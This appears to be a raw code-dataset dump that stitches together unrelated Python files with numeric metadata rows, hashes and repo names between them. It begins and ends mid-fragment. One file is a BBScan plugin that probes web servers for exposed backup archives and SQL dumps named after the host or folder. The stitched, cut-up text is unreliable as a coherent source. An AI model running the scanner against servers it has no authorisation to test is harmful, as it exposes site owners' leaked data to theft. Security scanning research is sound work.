test_array_return(self): ds = xr.Dataset(coords={'a': [1, 2, 3], 'b': [40, 50], 't': [0.0, 0.1, 0.2, 0.3, 0.4]}) ds['z1'] = (('a', 'b', 't'), np.array([[41 + 0.1j * np.arange(5), [np.nan] * 5], [[np.nan] * 5, 52 + 0.1j * np.arange(5)], [[np.nan] * 5, [np.nan] * 5]])) ds['z2'] = (('a', 'b', 't'), np.array([[41 - 0.1j * np.arange(5), [np.nan] * 5], [[np.nan] * 5, 52 - 0.1j * np.arange(5)], [[np.nan] * 5, [np.nan] * 5]])) settings = {'var_names': ['z1', 'z2'], 'var_dims': {('z1', 'z2'): 't'}, 'var_coords': {'t': [0.0, 0.1, 0.2, 0.3, 0.4]}} fill_missing_cases(ds, foo2_zarray1_zarray2, **settings) dst = combo_runner_to_ds(foo2_zarray1_zarray2, combos=[('a', [1, 2, 3]), ('b', [40, 50])], **settings) assert dst.equals(ds) def test_float_coords(self): ds = xr.Dataset(coords={'a': [1.1, 2.1, 3.1], 'b': [40.01, 50.01]}) ds['x'] = (('a', 'b'), np.array([[641.11, np.nan], [np.nan, 652.11], [np.nan, np.nan]])) fill_missing_cases(ds, fn=foo3_scalar, constants={'c': 600}, var_names='x') assert_allclose(ds.x.data, [[641.11, 651.11], [642.11, 652.11], [643.11, 653.11]])
46.080685
79
0.408871
2,365
18,847
3.103594
0.078647
0.012807
0.041417
0.019074
0.78406
0.748638
0.724387
0.671526
0.640055
0.639237
0
0.080735
0.387489
18,847
408
80
46.193627
0.555094
0.037831
0
0.50838
0
0
0.032023
0
0
0
0
0
0.22067
1
0.075419
false
0
0.019553
0
0.108939
0
0
0
0
null
0
0
0
0
1
1
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
fbd81201ced4fe0564a5952c5882dbc41438e5b9
1,300
py
Python
tests/conftest.py
sobelek/pymongo-migrate
de2347007cceb9c0594718959cf4d6652727a8b5
[ "Apache-2.0" ]
null
null
null
tests/conftest.py
sobelek/pymongo-migrate
de2347007cceb9c0594718959cf4d6652727a8b5
[ "Apache-2.0" ]
null
null
null
tests/conftest.py
sobelek/pymongo-migrate
de2347007cceb9c0594718959cf4d6652727a8b5
[ "Apache-2.0" ]
null
null
null
import random from datetime import timezone from pathlib import Path import pymongo import pytest from bson import CodecOptions from pymongo_migrate.mongo_migrate import MongoMigrate TEST_DIR = Path(__file__).parent @pytest.fixture def mongo_url(): return "mongodb://localhost:27017/" @pytest.fixture def db_name(): random_id = random.randint(100, 10_000_000) # nosec return f"test_{random_id}" @pytest.fixture def db_uri(mongo_url, db_name): return f"{mongo_url}{db_name}" @pytest.fixture def db(mongo_url, db_name): client = pymongo.MongoClient(mongo_url) yield client[db_name] client.drop_database(db_name) client.close() @pytest.fixture def db_collection(db): return db.get_collection( "pymongo_migrate", codec_options=CodecOptions(tz_aware=True, tzinfo=timezone.utc), ) @pytest.fixture() def migrations_dir(): return str(TEST_DIR / "migrations") @pytest.fixture def mongo_migrate(db_uri, db_name, db, migrations_dir): mm = MongoMigrate(pymongo.MongoClient(db_uri), migrations_dir=migrations_dir) yield mm mm.client.close() @pytest.fixture() def get_db_migrations(db_collection): def getter(): return list(db_collection.find(projection={"_id": False}, sort=[("name", 1)])) return getter
20.3125
86
0.73
178
1,300
5.08427
0.337079
0.114917
0.141436
0.079558
0.059669
0
0
0
0
0
0
0.015568
0.16
1,300
63
87
20.634921
0.813187
0.003846
0
0.186047
0
0
0.072699
0.020108
0
0
0
0
0
1
0.209302
false
0
0.162791
0.116279
0.534884
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
fbda7db9488522776ba4241a52e61804eb5525a3
244
py
Python
OOP/simpleclass.py
HarshilPatel007/learn-python
e64e6f8c95d39bfc229519ee7043787864997cdf
[ "MIT" ]
null
null
null
OOP/simpleclass.py
HarshilPatel007/learn-python
e64e6f8c95d39bfc229519ee7043787864997cdf
[ "MIT" ]
null
null
null
OOP/simpleclass.py
HarshilPatel007/learn-python
e64e6f8c95d39bfc229519ee7043787864997cdf
[ "MIT" ]
null
null
null
class Smartphone: def gallary(self): print("Gallary") def browser(self): print("Browser") def app_store(self): print("App Store") x = Smartphone() x.gallary() x.browser() x.gallary()
12.842105
27
0.536885
27
244
4.814815
0.37037
0.207692
0
0
0
0
0
0
0
0
0
0
0.32377
244
18
28
13.555556
0.787879
0
0
0.181818
0
0
0.102222
0
0
0
0
0
0
1
0.272727
false
0
0
0
0.363636
0.272727
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
fbdd9dcc5719737b6e2f6f877ae80b0cc5d6cbe3
948
py
Python
savu/plugins/filters/denoising/base_median_filter_tools.py
nghia-vo/Savu
1cf7343c141224643b2e1fb2f05e74448bc4fd58
[ "Apache-2.0" ]
null
null
null
savu/plugins/filters/denoising/base_median_filter_tools.py
nghia-vo/Savu
1cf7343c141224643b2e1fb2f05e74448bc4fd58
[ "Apache-2.0" ]
null
null
null
savu/plugins/filters/denoising/base_median_filter_tools.py
nghia-vo/Savu
1cf7343c141224643b2e1fb2f05e74448bc4fd58
[ "Apache-2.0" ]
null
null
null
from savu.plugins.plugin_tools import PluginTools class BaseMedianFilterTools(PluginTools): """A plugin to apply 2D/3D median filter. The 3D capability is enabled through padding. Note that the kernel_size in 2D will be kernel_size x kernel_size and in 3D case kernel_size x kernel_size x kernel_size. """ def define_parameters(self): """ kernel_size: visibility: basic dtype: int description: Kernel size of the median filter. default: 3 dimension: visibility: advanced dtype: str description: Dimensionality of the filter 2D/3D. default: 3D pattern: visibility: intermediate dtype: str options: [PROJECTION, SINOGRAM, VOLUME_YZ, VOLUME_XZ, VOLUME_XY] description: Pattern to apply this to. default: PROJECTION """
32.689655
77
0.60654
106
948
5.311321
0.54717
0.142096
0.058615
0.090586
0.094139
0
0
0
0
0
0
0.0144
0.340717
948
28
78
33.857143
0.8864
0.679325
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
1
0
0
3
fbe11ee1b54340c89c30f000c67cbaa376e0508a
3,028
py
Python
scripts/scan_by_hostname_or_folder.py
NeolithEra/BBScan
d754e9664d05e0e80ec879ebed227ad713976196
[ "Apache-2.0" ]
1
2020-04-18T15:36:55.000Z
2020-04-18T15:36:55.000Z
scripts/scan_by_hostname_or_folder.py
321811788/BBScan
af852f3d0f2d98a0c5fde5823a15ec8d29c520ea
[ "Apache-2.0" ]
null
null
null
scripts/scan_by_hostname_or_folder.py
321811788/BBScan
af852f3d0f2d98a0c5fde5823a15ec8d29c520ea
[ "Apache-2.0" ]
1
2020-04-18T15:36:59.000Z
2020-04-18T15:36:59.000Z
# /{hostname_or_folder}.zip {status=206} {type="application/"} {root_only} # /{hostname_or_folder}.rar {status=206} {type="application/"} {root_only} # /{hostname_or_folder}.tar.gz {status=206} {type="application/"} {root_only} # /{hostname_or_folder}.tar.bz2 {status=206} {type="application/"} {root_only} # /{hostname_or_folder}.tgz {status=206} {type="application/"} {root_only} # /{hostname_or_folder}.7z {status=206} {type="application/"} {root_only} # /{hostname_or_folder}.log {status=206} {type="application/"} {root_only} # # /{sub}.zip {status=206} {type="application/"} {root_only} # /{sub}.rar {status=206} {type="application/"} {root_only} # /{sub}.tar.gz {status=206} {type="application/"} {root_only} # /{sub}.tar.bz2 {status=206} {type="application/"} {root_only} # /{sub}.tgz {status=206} {type="application/"} {root_only} # /{sub}.7z {status=206} {type="application/"} {root_only} # # /../{hostname_or_folder}.zip {status=206} {type="application/"} # /../{hostname_or_folder}.rar {status=206} {type="application/"} # /../{hostname_or_folder}.tar.gz {status=206} {type="application/"} # /../{hostname_or_folder}.tar.bz2 {status=206} {type="application/"} # /../{hostname_or_folder}.tgz {status=206} {type="application/"} # /../{hostname_or_folder}.7z {status=206} {type="application/"} # /../{hostname_or_folder}.log {status=206} {type="application/"} from lib.common import save_user_script_result def do_check(self, url): if not self.conn_pool: return extensions = ['.zip', '.rar', '.tar.gz', '.tar.bz2', '.tgz', '.7z', '.log', '.sql'] if url == '/' and self.domain_sub: file_names = [self.host.split(':')[0], self.domain_sub] for name in file_names: for ext in extensions: status, headers, html_doc = self.http_request('/' + name + ext) if status == 206 and \ (self.has_status_404 or headers.get('content-type', '').find('application/') >= 0) or \ (ext == '.sql' and html_doc.find("CREATE TABLE") >= 0): save_user_script_result(self, status, self.base_url + '/' + name + ext, '', 
'Compressed File') elif url != '/': # sub folders like /aaa/bbb/ folder_name = url.split('/')[-2] if len(folder_name) >= 4: url_prefix = url[: -len(folder_name)-1] for ext in extensions: status, headers, html_doc = self.http_request(url_prefix + folder_name + ext) if status == 206 and headers.get('content-type', '').find('application/') >= 0: save_user_script_result(self, status, self.base_url + url_prefix + folder_name + ext, '', 'Compressed File')
56.074074
111
0.554491
349
3,028
4.601719
0.209169
0.123288
0.161893
0.298879
0.772105
0.749066
0.722914
0.619552
0.393524
0.244085
0
0.037787
0.265852
3,028
53
112
57.132075
0.68466
0.521466
0
0.166667
0
0
0.096842
0
0
0
0
0
0
1
0.041667
false
0
0.041667
0
0.125
0
0
0
0
null
0
0
1
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
8398280950838898824ce2da38a075df0f144502
243
py
Python
activflow/quotient/validators.py
mcgauranc/mosaiq
33c4b7db8f3dd1ef18dc0b63d06fb05ee8df4de0
[ "Apache-2.0" ]
567
2016-03-27T11:44:29.000Z
2021-06-12T14:06:55.000Z
activflow/tests/validators.py
NWUSTUDENT/ActivFlow
c5b3e340db9200b29fcaea778e0e6ed0f7ba491b
[ "Apache-2.0" ]
14
2016-03-26T19:33:52.000Z
2021-06-10T17:35:19.000Z
activflow/tests/validators.py
NWUSTUDENT/ActivFlow
c5b3e340db9200b29fcaea778e0e6ed0f7ba491b
[ "Apache-2.0" ]
111
2016-03-31T18:33:14.000Z
2021-06-12T14:06:57.000Z
"""Custom validation logic""" from django.core.exceptions import ValidationError def validate_initial_cap(value): """Sample validation""" if not value[0].isupper(): raise ValidationError('First character should be capital')
24.3
66
0.728395
28
243
6.25
0.892857
0
0
0
0
0
0
0
0
0
0
0.004902
0.160494
243
9
67
27
0.852941
0.168724
0
0
0
0
0.172775
0
0
0
0
0
0
1
0.25
false
0
0.25
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
83e8e0b2f9c02d8e24e0cd19f4fb645dcb4a4c19
97
py
Python
sniffer/__init__.py
matham/sniffer
3ecb999bce0c01bf770b774d11a2bfb7362e20f2
[ "MIT" ]
null
null
null
sniffer/__init__.py
matham/sniffer
3ecb999bce0c01bf770b774d11a2bfb7362e20f2
[ "MIT" ]
null
null
null
sniffer/__init__.py
matham/sniffer
3ecb999bce0c01bf770b774d11a2bfb7362e20f2
[ "MIT" ]
null
null
null
''' ''' __version__ = '0.1-dev' device_config_name = 'Devices' exp_config_name = 'experiment'
10.777778
30
0.680412
12
97
4.833333
0.833333
0.344828
0
0
0
0
0
0
0
0
0
0.024096
0.14433
97
8
31
12.125
0.674699
0
0
0
0
0
0.266667
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
83f460a00cf60fe97299760a32cc20478b67569f
281
py
Python
audio_f.py
svnviet/TTS
dd951048d659e18f34b71530f34144e8625e20e1
[ "MIT" ]
null
null
null
audio_f.py
svnviet/TTS
dd951048d659e18f34b71530f34144e8625e20e1
[ "MIT" ]
1
2020-04-19T14:32:59.000Z
2020-04-19T14:32:59.000Z
audio_f.py
svnviet/TTS
dd951048d659e18f34b71530f34144e8625e20e1
[ "MIT" ]
null
null
null
# from hparams import hparams # from text import text_to_sequence # # # def Sy(text): # cleaner_names = [x.strip() for x in hparams.cleaners.split(',')] # seq = text_to_sequence(text, cleaner_names) # return text # print(Sy('danh mục đầu tư (so với các mn)'))
28.1
71
0.651246
42
281
4.214286
0.642857
0.067797
0.158192
0
0
0
0
0
0
0
0
0
0.217082
281
9
72
31.222222
0.804545
0.900356
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
83f63344c8c2884cc3b5b8f00c73296312a3da18
1,357
py
Python
tests/scaffolds/xunit/test_suite_setup_failure.py
filfreire/questions-three
1d1d621d5647407bf2d1b271e0b9c7c9f1afc5c8
[ "MIT" ]
5
2019-07-22T06:04:07.000Z
2021-07-23T06:01:51.000Z
tests/scaffolds/xunit/test_suite_setup_failure.py
filfreire/questions-three
1d1d621d5647407bf2d1b271e0b9c7c9f1afc5c8
[ "MIT" ]
15
2020-07-28T17:33:40.000Z
2021-08-23T17:30:05.000Z
tests/scaffolds/xunit/test_suite_setup_failure.py
filfreire/questions-three
1d1d621d5647407bf2d1b271e0b9c7c9f1afc5c8
[ "MIT" ]
4
2019-08-25T22:41:59.000Z
2020-10-21T14:28:15.000Z
from logging import StreamHandler from unittest import TestCase, main from expects import expect, equal from twin_sister import open_dependency_context from questions_three.event_broker import EventBroker, subscribe_event_handlers from questions_three.scaffolds.xunit import TestSuite from twin_sister.fakes import EmptyFake def run_suite(): class Suite(TestSuite): def setup_suite(self): raise RuntimeError("I got the boogie fever") def test_one(self): pass def test_two(self): pass def test_three(self): pass class TestSuiteSetupFailure(TestCase): """ As a test developer, I would like the suite to automatically skip every test if setup fails So I do not need to skip each test individually """ def setUp(self): self.context = open_dependency_context(supply_fs=True, supply_logging=True) self.context.inject(StreamHandler, EmptyFake()) EventBroker.reset() subscribe_event_handlers(self) self.skip_events = 0 def tearDown(self): self.context.close() def on_test_skipped(self, **kwargs): self.skip_events += 1 def test_skips_all_tests(self): run_suite() expect(self.skip_events).to(equal(3)) # number of tests if "__main__" == __name__: main()
25.12963
83
0.683125
173
1,357
5.144509
0.473988
0.031461
0.047191
0.033708
0
0
0
0
0
0
0
0.002921
0.243183
1,357
53
84
25.603774
0.863681
0.114959
0
0.090909
0
0
0.025489
0
0
0
0
0
0
1
0.272727
false
0.090909
0.212121
0
0.545455
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
3
f7b45d31d5af3e815012795068a28de2e104dada
837
py
Python
head_first_design_patterns/decorator/pizza/pizza.py
incolumepy-cursos/poop
e4ac26b8d2a8c263a93fd9642fab52aafda53d80
[ "MIT" ]
null
null
null
head_first_design_patterns/decorator/pizza/pizza.py
incolumepy-cursos/poop
e4ac26b8d2a8c263a93fd9642fab52aafda53d80
[ "MIT" ]
null
null
null
head_first_design_patterns/decorator/pizza/pizza.py
incolumepy-cursos/poop
e4ac26b8d2a8c263a93fd9642fab52aafda53d80
[ "MIT" ]
null
null
null
from abc import abstractmethod """ NOTES: - Thickcrust and Thincrust are pizza, changing description and implement your own price - description in class Pizza is used as a default - As an abstract method, cost should be implemented by subclasses. It is used to formalize a contract between subclasses. """ class Pizza: description = "Basic Pizza" def get_description(self): return self.description @abstractmethod def cost(self): raise NotImplementedError class ThickcrustPizza(Pizza): def __init__(self): self.description = "Thick crust pizza, with tomato sauce" def cost(self): return 7.99 class ThincrustPizza(Pizza): def __init__(self): self.description = "Thin crust pizza, with tomato sauce" def cost(self): return 7.99
22.026316
76
0.684588
103
837
5.475728
0.533981
0.042553
0.058511
0.056738
0.269504
0.269504
0.159574
0.159574
0.159574
0.159574
0
0.009539
0.248507
837
37
77
22.621622
0.887122
0
0
0.388889
0
0
0.151013
0
0
0
0
0
0
1
0.333333
false
0
0.055556
0.166667
0.777778
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
f7c6628a945394fac9c1407e41ed845e9d9851a1
6,723
py
Python
src/pymates/markdown.py
weistn/pymates
c375b46469ebb23fdb29f81ec175837751d0f0ce
[ "BSD-3-Clause" ]
null
null
null
src/pymates/markdown.py
weistn/pymates
c375b46469ebb23fdb29f81ec175837751d0f0ce
[ "BSD-3-Clause" ]
null
null
null
src/pymates/markdown.py
weistn/pymates
c375b46469ebb23fdb29f81ec175837751d0f0ce
[ "BSD-3-Clause" ]
null
null
null
import os import pymates.fonts from pymates.dom import DocumentNode, ParagNode, StyleNode, SpanNode, MathNode, inline from pymates.lom import Alignment def document(): return DocumentNode(document) def pagesize(size): return style(pageSize=size) @inline("counters") def counter(node, counterFmt, refFmt, *names): section = node.section() if section == None: raise BaseException("Parent of counter must be a section") doc = node.document() c = [] for i in range(0, len(names) - 1): c.append(doc.counter(names[i])) c.append(doc.incCounter(names[len(names) - 1])) s = counterFmt.format(*c) section.setReferenceName(refFmt.format(*c)) return s @inline("counters") def label(node, name): section = node.section() if section == None: raise BaseException("Parent of label must be a section") node.document().setLabel(name, section) @inline("references") def ref(node, name): section = node.document().label(name) return section.referenceName() def p(*children): return ParagNode(p, style={"fontSize": 12}, children=children) def h1(*children): return ParagNode(h1, style={"fontSize": 32}, children=children) def h2(*children): return ParagNode(h2, style={"fontSize": 24}, children=children) def h3(*children): return ParagNode(h3, style={"fontSize": 20}, children=children) def h4(*children): return ParagNode(h4, style={"fontSize": 16}, children=children) def bulletlist(*children): print("------------- BULLET LIST-----------") return ParagNode(bulletlist, style={}, children=children) def bulletitem(*children): return ParagNode(bulletitem, style={"fontSize": 12, "enum": "- "}, parentContainer=bulletlist, isExplicitContainer=True, children=children) # TODO: listitem def chapter(*children): return h1(counter("Chapter {}: ", "Chapter {}", "Level1"), *children) def subchapter(*children): return h2(counter("Section {}.{}: ", "Section {}.{}", "Level1", "Level2"), *children) def code(*children): return ParagNode(code, style={"fontFamily": "Courier"}, children=children) def math(*children): return 
ParagNode(code, style={}, children=children) def style(child = None, **styleInfo): return StyleNode(style, child=child, style=styleInfo) def bold(child = None): return style(child, fontWeight=700) def italic(child = None): return style(child, italic=True) def emph(child = None): return bold(italic(child)) def underline(child = None): return style(child, underline=True) def strike(child = None): return style(child, strikeOut=True) def tt(child = None): return style(child, fontFamily="Courier") def color(red, green, blue, child = None): return style(child, color=(red, green, blue)) def red(child = None): return color(255, 0, 0, child) def align(a, child = None): return style(child, align=a) def left(child = None): return align(Alignment.Left, child) def right(child = None): return align(Alignment.Right, child) def center(child = None): return align(Alignment.Center, child) def justify(child = None): return align(Alignment.Justify, child) def margin(left=None, top=None, right=None, bottom=None, child=None): return style(child, margin={"left": left, "top": top, "right": right, "bottom": bottom}) def padding(left=None, top=None, right=None, bottom=None, child=None): return style(child, padding={"left": left, "top": top, "right": right, "bottom": bottom}) def inlineMath(child): return style(child, math=True) def inlineCode(child): return style(child, color=(0xd0, 0x10, 0x40), fontFamily="Courier") # def fract(counter, denominator): # return MathNode(fract, [counter, denominator]) def span(*children): return SpanNode(span, list(children)) def pageLayout(repeat = False): return style(None, pageLayout={"repeat": repeat}) def nextPageLayout(repeat = False): return style(None, nextPageLayout={"repeat": repeat}) def pageBox(flow, rect): return style(None, pageBox={"rect": rect, "flow": flow}) def pageBreak(): return style(child, pageBreak=True) # scope is "document" or "flow" def flow(name = "", scope = "document"): if scope != "document" and scope != "flow": raise 
BaseException(f"Unknown flow scope '{scope}'") if name == "" and scope == "flow": raise BaseException("A flow with 'scope=flow' must have a name") return style(flow = name, flowScope = scope) def py(value): return value @inline("counters") def setvar(node, name, value): node.document().setVariable(name, value) return None @inline("references") def var(node, name): return node.document().variable(name) # ----------------------------------------- _lobster = False def lobster(child = None): global _lobster if not _lobster: fontPath = os.path.join(os.path.dirname(pymates.__file__), "fonts") pymates.fonts.registerFont(os.path.join(fontPath, "Lobster-Regular.ttf"), "Lobster", 400, False) _lobster = True return style(child, fontFamily = "Lobster") _roboto = False def roboto(child = None): global _roboto if not _roboto: fontPath = os.path.join(os.path.dirname(pymates.__file__), "fonts") pymates.fonts.registerFont(os.path.join(fontPath, "Roboto-Regular.ttf"), "Roboto", 400, False) pymates.fonts.registerFont(os.path.join(fontPath, "Roboto-Bold.ttf"), "Roboto", 700, False) _roboto = True return style(child, fontFamily = "Roboto") # ----------------------------------------- def mybox(*children): return p(style(flow = "mybox"), *children) from pymates.sizes import mm, A4, landscape def slidedeck(): return pagesize(landscape(A4)) def slide(*children): return ParagNode(slide, style={}, parentContainer=document, isDefaultContainer=True, children=( flow(), pageLayout(), margin(20*mm, 50*mm, 20*mm, 20*mm), pageBox(flow="title", rect=(20*mm, 15*mm, 250*mm, 30*mm)), pageBox(flow="footer", rect=(20*mm, 190*mm, 250*mm, 10*mm)), *children )) def title(*children): return ParagNode(title, style={"fontSize": 32}, parentContainer=slide, children=( flow("title", "flow"), *children )) def footer(localPage = False, *children): return ParagNode(footer, style={"fontSize": 12}, children=( flow("footer", "flow" if localPage else "document"), *children )) # ----------------------------------------- 
if __name__ == '__main__': deck().append( slide(tmpl="black", bold=True).append( "Hello ", bold(span(italic("World"), "!!!")) ) ) # ``` # \deck # \slide(tmpl="white") # Hello \bold{\italic{World}!!!} # ```
28.978448
143
0.652239
817
6,723
5.337821
0.221542
0.047925
0.051594
0.041275
0.245127
0.124283
0.124283
0.124283
0.111901
0.094015
0
0.015451
0.172096
6,723
232
144
28.978448
0.768056
0.047449
0
0.088608
0
0
0.098561
0
0
0
0.001877
0.00431
0
1
0.316456
false
0
0.031646
0.265823
0.658228
0.006329
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
f7c70f678bb26d9c05f0d8b472e2413618e50c95
938
py
Python
entities/recommendation.py
bitmarc/Recomendautos_Server
4db5ca2f07d97d2f025f5879b4a25553c2eb2e72
[ "OML" ]
null
null
null
entities/recommendation.py
bitmarc/Recomendautos_Server
4db5ca2f07d97d2f025f5879b4a25553c2eb2e72
[ "OML" ]
null
null
null
entities/recommendation.py
bitmarc/Recomendautos_Server
4db5ca2f07d97d2f025f5879b4a25553c2eb2e72
[ "OML" ]
null
null
null
''' Clase que modela una entidad de recomendación, contiene la informacion de automoviles y perfil ''' class Recommendation: def __init__(self, id, arrAutomobiles, profile): self.__id=id self.__arrAutomobiles=arrAutomobiles self.__profile=profile def get_recommendation(self): dataA=[] for automobile in self.__arrAutomobiles: dataA.append(automobile.get_automobile()) data={"idRecommendation":self.__id, "results":dataA, "profile":self.__profile.get_profile()} return data def getId(self): return self.__id def setId(self, id): self.__id=id def getArrAutomobiles(self): return self.__arrAutomobiles def setResults(self, arrAutomobiles): self.__arrAutomobiles=arrAutomobiles def getProfile(self): return self.__profile def setProfile(self, profile): self.__profile=profile
26.055556
100
0.668443
98
938
6.081633
0.377551
0.060403
0.07047
0
0
0
0
0
0
0
0
0
0.24307
938
36
101
26.055556
0.839437
0.100213
0
0.26087
0
0
0.035842
0
0
0
0
0
0
1
0.347826
false
0
0
0.130435
0.565217
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
f7df1b777d2fdeba30c848da1b2c74a7801a6a72
93
py
Python
python/testData/intentions/returnTypeInPy3Annotation.py
truthiswill/intellij-community
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
[ "Apache-2.0" ]
2
2019-04-28T07:48:50.000Z
2020-12-11T14:18:08.000Z
python/testData/intentions/returnTypeInPy3Annotation.py
truthiswill/intellij-community
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
[ "Apache-2.0" ]
173
2018-07-05T13:59:39.000Z
2018-08-09T01:12:03.000Z
python/testData/intentions/returnTypeInPy3Annotation.py
truthiswill/intellij-community
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
[ "Apache-2.0" ]
2
2020-03-15T08:57:37.000Z
2020-04-07T04:48:14.000Z
def g(x): return x def f(x): y = g(x.keys()) return y<caret>.startswith('foo')
11.625
37
0.526882
17
93
2.882353
0.588235
0.081633
0
0
0
0
0
0
0
0
0
0
0.268817
93
7
38
13.285714
0.720588
0
0
0
0
0
0.032258
0
0
0
0
0
0
0
null
null
0
0
null
null
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
3
790798beeadcf685cc4291097796e2d302a38fec
239
py
Python
revise/libs/python/pyste/src/Pyste/__init__.py
DD-L/deel.boost.python
e32cd62022bbf7c5822d150150330d988e041f02
[ "MIT" ]
198
2015-01-13T05:47:18.000Z
2022-03-09T04:46:46.000Z
thirdparty/boost-python/libs/python/pyste/src/Pyste/__init__.py
alexa-infra/negine
d9060a7c83a41c95c361c470b56c2ddab3ba04de
[ "MIT" ]
9
2015-01-28T16:33:19.000Z
2020-04-12T23:03:28.000Z
thirdparty/boost-python/libs/python/pyste/src/Pyste/__init__.py
alexa-infra/negine
d9060a7c83a41c95c361c470b56c2ddab3ba04de
[ "MIT" ]
139
2015-01-15T20:09:31.000Z
2022-01-31T15:21:16.000Z
# Copyright Bruno da Silva de Oliveira 2003. Use, modification and # distribution is subject to the Boost Software License, Version 1.0. # (See accompanying file LICENSE_1_0.txt or copy at # http://www.boost.org/LICENSE_1_0.txt)
34.142857
70
0.74477
39
239
4.461538
0.794872
0.034483
0.103448
0.137931
0
0
0
0
0
0
0
0.050761
0.175732
239
6
71
39.833333
0.832487
0.92887
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
791889e899a24dfc909dd3df7de14402132d5121
1,056
py
Python
floreal/templatetags/floreal_filters.py
roco/circuit-court
a405e871fe044dee591e646b1d1523c8465e6054
[ "MIT" ]
null
null
null
floreal/templatetags/floreal_filters.py
roco/circuit-court
a405e871fe044dee591e646b1d1523c8465e6054
[ "MIT" ]
null
null
null
floreal/templatetags/floreal_filters.py
roco/circuit-court
a405e871fe044dee591e646b1d1523c8465e6054
[ "MIT" ]
null
null
null
#!/usr/bin/python # -*- coding: utf-8 -*- from django import template from floreal import models as m register = template.Library() @register.filter def price(f): return u"%.02f€" % f @register.filter def price_nocurrency(f): return u"%.02f" % f @register.filter def weight(w): if w>=1: return u"%.2gkg" % w else: return u"%dg" % (w*1000) @register.filter def email(u): return '"%s %s" <%s>' % (u.first_name, u.last_name, u.email) @register.filter def unit_multiple(unit): if unit[0].isdigit(): return u"×"+unit else: return u" "+unit @register.filter def subgroup_state(sg, dv): x = dv.subgroupstatefordelivery_set.filter(delivery=dv, subgroup=sg) return x[0].state if x else m.SubgroupStateForDelivery.DEFAULT @register.filter def subgroup_has_purchases(sg, dv): return m.Purchase.objects.filter(product__delivery_id=dv, user__in=m.Subgroup.objects.get(pk=sg).users.all()).exists() @register.filter def order(dv, u): return m.Order(u, dv)
19.555556
97
0.650568
157
1,056
4.305732
0.420382
0.16568
0.201183
0.065089
0
0
0
0
0
0
0
0.015403
0.200758
1,056
53
98
19.924528
0.783175
0.035985
0
0.242424
0
0
0.033465
0
0
0
0
0
0
1
0.242424
false
0
0.060606
0.151515
0.545455
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
3
793b431cf5d0d878ea1f8b1e525e56a41bc825c6
171
py
Python
tests/exploratory/multiple_basedirs/radish2/steps.py
temoctzin/radish
1d904b9a7bf9eb5b263c86e3fc3a996956747ecc
[ "MIT" ]
null
null
null
tests/exploratory/multiple_basedirs/radish2/steps.py
temoctzin/radish
1d904b9a7bf9eb5b263c86e3fc3a996956747ecc
[ "MIT" ]
null
null
null
tests/exploratory/multiple_basedirs/radish2/steps.py
temoctzin/radish
1d904b9a7bf9eb5b263c86e3fc3a996956747ecc
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from radish import then @then("I expect the result to be {result:g}") def expect_result(step, result): assert step.context.result == result
19
45
0.678363
26
171
4.423077
0.692308
0
0
0
0
0
0
0
0
0
0
0.007092
0.175439
171
8
46
21.375
0.808511
0.122807
0
0
0
0
0.243243
0
0
0
0
0
0.25
1
0.25
false
0
0.25
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
f731b0e7750a7bea8517170165c3c68c3dc22cf8
844
py
Python
setup.py
jbarbadillo/pycoinmon
035e64652c533a569c6b236f54e12aff35ad82b1
[ "MIT" ]
null
null
null
setup.py
jbarbadillo/pycoinmon
035e64652c533a569c6b236f54e12aff35ad82b1
[ "MIT" ]
null
null
null
setup.py
jbarbadillo/pycoinmon
035e64652c533a569c6b236f54e12aff35ad82b1
[ "MIT" ]
null
null
null
"""Packaging script for pycoinmon, a Python port of COINMON."""

